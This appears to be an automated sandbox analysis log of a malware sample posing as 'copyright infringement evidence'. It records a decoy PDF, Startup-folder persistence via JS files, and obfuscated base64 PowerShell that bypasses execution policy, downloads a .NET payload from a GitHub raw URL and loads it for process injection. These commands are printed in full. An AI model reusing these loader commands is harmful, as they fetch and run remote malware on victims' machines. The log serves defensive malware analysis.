Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18DA298 CloseHandle,UnhandledExceptionFilter,SetUnhandledExceptionFilter,memcmp,memmove,__current_exception_context,__CxxFrameHandler3,__current_exception,__C_specific_handler,memmove, 0_2_00007FF7A18DA298
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18DA298 CloseHandle,UnhandledExceptionFilter,SetUnhandledExceptionFilter,memcmp,memmove,__current_exception_context,__CxxFrameHandler3,__current_exception,__C_specific_handler,memmove, 0_2_00007FF7A18DA298
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18DA298 CloseHandle,UnhandledExceptionFilter,SetUnhandledExceptionFilter,memcmp,memmove,__current_exception_context,__CxxFrameHandler3,__current_exception,__C_specific_handler,memmove, 0_2_00007FF7A18DA298
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18DA298 CloseHandle,UnhandledExceptionFilter,SetUnhandledExceptionFilter,memcmp,memmove,__current_exception_context,__CxxFrameHandler3,__current_exception,__C_specific_handler,memmove, 0_2_00007FF7A18DA298
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe Network Connect: 188.114.96.3 443
Yara detected Powershell decode and execute
Source: Yara match File source: amsi64_8000.amsi.csv, type: OTHER
Source: Yara match File source: amsi64_1784.amsi.csv, type: OTHER
Source: Yara match File source: amsi64_8824.amsi.csv, type: OTHER
Source: Yara match File source: amsi64_9176.amsi.csv, type: OTHER
Source: Yara match File source: amsi64_3668.amsi.csv, type: OTHER
Bypasses PowerShell execution policy
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Fromba
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Process created: C:\Windows\System32\cmd.exe "cmd" /C start C:\Users\Public\Documents\Benefits-_JD-_Photo-_Video-_UNQILO-_Q4-_2024_Benefits-_JD-_Photo.pdf Jump to behavior
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Process created: C:\Windows\System32\wscript.exe "wscript.exe" C:\Users\Public\Documents\2p_bee.js Jump to behavior
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Process created: C:\Windows\System32\cmd.exe "cmd" /C echo %username% Jump to behavior
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Process created: C:\Windows\System32\wscript.exe "wscript.exe" C:\Users\Public\Documents\2x_bee.js Jump to behavior
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Process created: C:\Windows\System32\cmd.exe "cmd" /C echo %username% Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\Public\Documents\Benefits-_JD-_Photo-_Video-_UNQILO-_Q4-_2024_Benefits-_JD-_Photo.pdf" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')') Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Fromba Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe wscript.exe "C:\Users\Public\Documents\2p_bee.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Fromba
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )"
